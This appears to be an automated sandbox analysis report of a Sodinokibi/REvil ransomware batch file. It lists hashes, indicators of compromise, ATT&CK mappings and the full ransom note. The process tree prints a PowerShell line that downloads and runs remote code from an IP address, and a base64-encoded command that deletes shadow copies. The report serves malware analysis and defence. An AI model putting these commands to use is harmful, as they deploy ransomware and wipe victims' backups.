sodinokibi | 6e19ccbb3e491327f4ddebd05fd7ce6c87d9a94acd5851b856569ecb1a17a347

General

Target

6bfe2bf5d32adbdaa5ef03bf7c3652cf.bat
Size

215B
MD5

4ff9830e5ccfee8915f14f83fe8f1918
SHA1

0efe2413519a6ce400cc4042ee029c2b84b73b25
SHA256

6e19ccbb3e491327f4ddebd05fd7ce6c87d9a94acd5851b856569ecb1a17a347
SHA512

222eeadcd7acf048a6e5cd50d5df143c63f1200f9bc571333aff360ba7e88453152e071383d1f6d68fc889556beb01b931f08305d5daaa4ed1e697be60920108

Score

10^/10

ransomware persistence sodinokibi

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/6bfe2bf5d32adbdaa5ef03bf7c3652cf

Extracted

Path

C:\21bh2n-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 21bh2n. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/176BEE8C9B811708 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/176BEE8C9B811708 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: gaKUvCGmLsAUQwqdJcX9xcwlKrMvjlsS/raB2V2K3Xc00et6uREZh8ri41Jues0z cOF0kyJsmAhRVGB4mB6SffD5yBciIF6YGuXRuZjT6DfIMIc4z0iC4w8u+/3bkubp IUkXVMVM0qVZ5ceaSX3lB8HtBNxGX3l6CWb+cKnDhmxqzx7PowT2jgNz7rqr3lIB nNvQ4beyBH24FN8dZbmlkjASCqsAVyateSXb0nIUAL475AtJyRzYonsvtV+oa9Tw x7NH3DuikE9XgxQSvI4iUYj6D2Ep/+vzw0kPns+RUVOO1MY8FI8N2ZyY+FnGa3Mj T1P7crv7Y1CeEYT9qIbdgwFyaEoVyvGZPR13kgNkPVyOVs98G8py494rYJyUqdvS 6KCwQ/lBrnzbPlekt6v+4wk6/aWu+pA+XhB2DDY3oLxCdN4TlP8JfuwD7JJJBSH2 79GJgzyuKWRorRoeE7Rl2cCjOCaPW1T6WB5+MlFPPTO2wGwa6wXdQ6hWCeAyKsrg mlq7jwh5aoGLVVKQlCiNJwLR5NX4ShP7qKPs7QkTqebZlDe7rouivDG+LDzfvTDF rlD+4zjRF+WovqUO7cI8cYhK5CPxP9tNKwmBUB8jhT6HJ+gef98MAevxbZGm3O2h bKflEVHUCeS2YhrcqNdiau9dlB54084ZzR6LNrYhlqt5lGFmBm0ehuRRrNd/17jc 8Ydswr5Rxfxjf8jGFoyZyq5np5dfOI243g0oN4PUmmhcJ+Fk82MId83kGz432/Z3 94rAMGRBqVm4/aS1/Jc8d8ftqlSryet8f/yr++SjqeJSUI2XzEMWYbES9rUdr2BW WGHYhIbTpG0U+Ab89rP+2E8yQMuiTaIrBou/du4yyf53pO8+0rnYXAstLh8qb7Im gX1FuCAN2NGRSAoMtLqc14dct12wcceA31ZbU0VH1wjC3nd2/bH3kUOKXPKPTsaa TrC5EtdclwIGNrJmgq3EafxGMaD98+hfYsrAbK8oharquscdkyMnWK7xPx85oOJ3 FDTKzLZTIMfSZTCMkb3iCGT139zDyWesKPKaZhsFIOvKcSRTFJYwmh7GmGyCIhFt 9bws57RTyWv5sHYMTlSq4JdE27EbgeJRolRSnkCjY65re+AoybdNsHic65rMEuqk i/Zo8DXZYoB0GDQ4e2W/ETf5TtlmXzm3rPcuo4recduRCeuMTxgwdeK4GHidFwu/ Ry7F31TfO4Qx449hSIt2VAXadF67P3HEGwhGalkCuknSfDkTKvmDpdfOmbMJ7fAi fFVtehw35t6EjVILIlnJgsjkj9YNuhZ1HXmS+dhBNFo= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/176BEE8C9B811708

http://decryptor.cc/176BEE8C9B811708

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 1012 powershell.exe

flow	pid	process
5	1012	powershell.exe

Modifies extensions of user files 7 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\CompressNew.raw => \??\c:\users\admin\pictures\CompressNew.raw.21bh2n	powershell.exe
File renamed	C:\Users\Admin\Pictures\CompleteRedo.png => \??\c:\users\admin\pictures\CompleteRedo.png.21bh2n	powershell.exe
File renamed	C:\Users\Admin\Pictures\DenyApprove.png => \??\c:\users\admin\pictures\DenyApprove.png.21bh2n	powershell.exe
File renamed	C:\Users\Admin\Pictures\InstallUnblock.crw => \??\c:\users\admin\pictures\InstallUnblock.crw.21bh2n	powershell.exe
File renamed	C:\Users\Admin\Pictures\SetResize.raw => \??\c:\users\admin\pictures\SetResize.raw.21bh2n	powershell.exe
File renamed	C:\Users\Admin\Pictures\UninstallConnect.tif => \??\c:\users\admin\pictures\UninstallConnect.tif.21bh2n	powershell.exe
File renamed	C:\Users\Admin\Pictures\UseRedo.tif => \??\c:\users\admin\pictures\UseRedo.tif.21bh2n	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d3bk4y2he.bmp"	powershell.exe

Drops file in Program Files directory 35 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\ConvertToInitialize.mpe	powershell.exe
File opened for modification	\??\c:\program files\InvokeNew.midi	powershell.exe
File opened for modification	\??\c:\program files\OutClose.mov	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\21bh2n-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\SwitchImport.ppsm	powershell.exe
File opened for modification	\??\c:\program files\FindReset.wmx	powershell.exe
File opened for modification	\??\c:\program files\GrantComplete.xlsx	powershell.exe
File opened for modification	\??\c:\program files\ImportInstall.vsdm	powershell.exe
File opened for modification	\??\c:\program files\RedoComplete.ex_	powershell.exe
File opened for modification	\??\c:\program files\ConvertToJoin.wvx	powershell.exe
File opened for modification	\??\c:\program files\ConvertToUpdate.vdw	powershell.exe
File opened for modification	\??\c:\program files\InitializeProtect.eps	powershell.exe
File opened for modification	\??\c:\program files\ResolveConvertFrom.xlsx	powershell.exe
File opened for modification	\??\c:\program files\OpenHide.vdx	powershell.exe
File opened for modification	\??\c:\program files\RevokeStep.docx	powershell.exe
File opened for modification	\??\c:\program files\TraceCheckpoint.mp2	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\21bh2n-readme.txt	powershell.exe
File created	\??\c:\program files\21bh2n-readme.txt	powershell.exe
File created	\??\c:\program files (x86)\21bh2n-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\GroupCheckpoint.vdx	powershell.exe
File opened for modification	\??\c:\program files\RepairPop.docx	powershell.exe
File opened for modification	\??\c:\program files\RevokeResize.dotx	powershell.exe
File opened for modification	\??\c:\program files\StopUnpublish.docx	powershell.exe
File opened for modification	\??\c:\program files\UnregisterInitialize.dotm	powershell.exe
File opened for modification	\??\c:\program files\InstallPop.ttf	powershell.exe
File opened for modification	\??\c:\program files\MoveSelect.edrwx	powershell.exe
File opened for modification	\??\c:\program files\PopRegister.clr	powershell.exe
File opened for modification	\??\c:\program files\ReadConvertFrom.zip	powershell.exe
File opened for modification	\??\c:\program files\SplitHide.gif	powershell.exe
File opened for modification	\??\c:\program files\ConfirmRead.xht	powershell.exe
File opened for modification	\??\c:\program files\ConvertCompare.mp2	powershell.exe
File opened for modification	\??\c:\program files\MergeFind.wma	powershell.exe
File opened for modification	\??\c:\program files\UndoTest.au3	powershell.exe
File opened for modification	\??\c:\program files\UninstallResolve.mpeg3	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\21bh2n-readme.txt	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

1012 powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

1012 powershell.exe
1012 powershell.exe
1012 powershell.exe
620 powershell.exe
620 powershell.exe

pid	process
1012	powershell.exe

pid	process
1012	powershell.exe
1012	powershell.exe
1012	powershell.exe
620	powershell.exe
620	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	1012	powershell.exe
Token: SeDebugPrivilege	1012	powershell.exe
Token: SeDebugPrivilege	620	powershell.exe
Token: SeBackupPrivilege	2040	vssvc.exe
Token: SeRestorePrivilege	2040	vssvc.exe
Token: SeAuditPrivilege	2040	vssvc.exe
Token: SeTakeOwnershipPrivilege	1012	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 844 wrote to memory of 1012	844	cmd.exe	powershell.exe
PID 844 wrote to memory of 1012	844	cmd.exe	powershell.exe
PID 844 wrote to memory of 1012	844	cmd.exe	powershell.exe
PID 844 wrote to memory of 1012	844	cmd.exe	powershell.exe
PID 1012 wrote to memory of 620	1012	powershell.exe	powershell.exe
PID 1012 wrote to memory of 620	1012	powershell.exe	powershell.exe
PID 1012 wrote to memory of 620	1012	powershell.exe	powershell.exe
PID 1012 wrote to memory of 620	1012	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\6bfe2bf5d32adbdaa5ef03bf7c3652cf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:844

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/6bfe2bf5d32adbdaa5ef03bf7c3652cf');Invoke-CXLQETAA;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1012

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:620

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:2040

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Download Submit
memory/620-23-0x0000000000000000-mapping.dmp

Download
memory/620-25-0x00000000749A0000-0x000000007508E000-memory.dmp

Filesize
6.9MB

Download
memory/1012-5-0x0000000005240000-0x0000000005241000-memory.dmp

Filesize
4KB

Download
memory/1012-22-0x00000000062F0000-0x00000000062F1000-memory.dmp

Filesize
4KB

Download
memory/1012-21-0x0000000005700000-0x0000000005701000-memory.dmp

Filesize
4KB

Download
memory/1012-14-0x0000000006150000-0x0000000006151000-memory.dmp

Filesize
4KB

Download
memory/1012-13-0x00000000060D0000-0x00000000060D1000-memory.dmp

Filesize
4KB

Download
memory/1012-8-0x0000000005680000-0x0000000005681000-memory.dmp

Filesize
4KB

Download
memory/1012-0-0x0000000000000000-mapping.dmp

Download
memory/1012-4-0x0000000002590000-0x0000000002591000-memory.dmp

Filesize
4KB

Download
memory/1012-3-0x0000000004890000-0x0000000004891000-memory.dmp

Filesize
4KB

Download
memory/1012-2-0x0000000000520000-0x0000000000521000-memory.dmp

Filesize
4KB

Download
memory/1012-1-0x00000000749A0000-0x000000007508E000-memory.dmp

Filesize
6.9MB

Download
memory/1012-38-0x0000000009062000-0x00000000090C0000-memory.dmp

Filesize
376KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads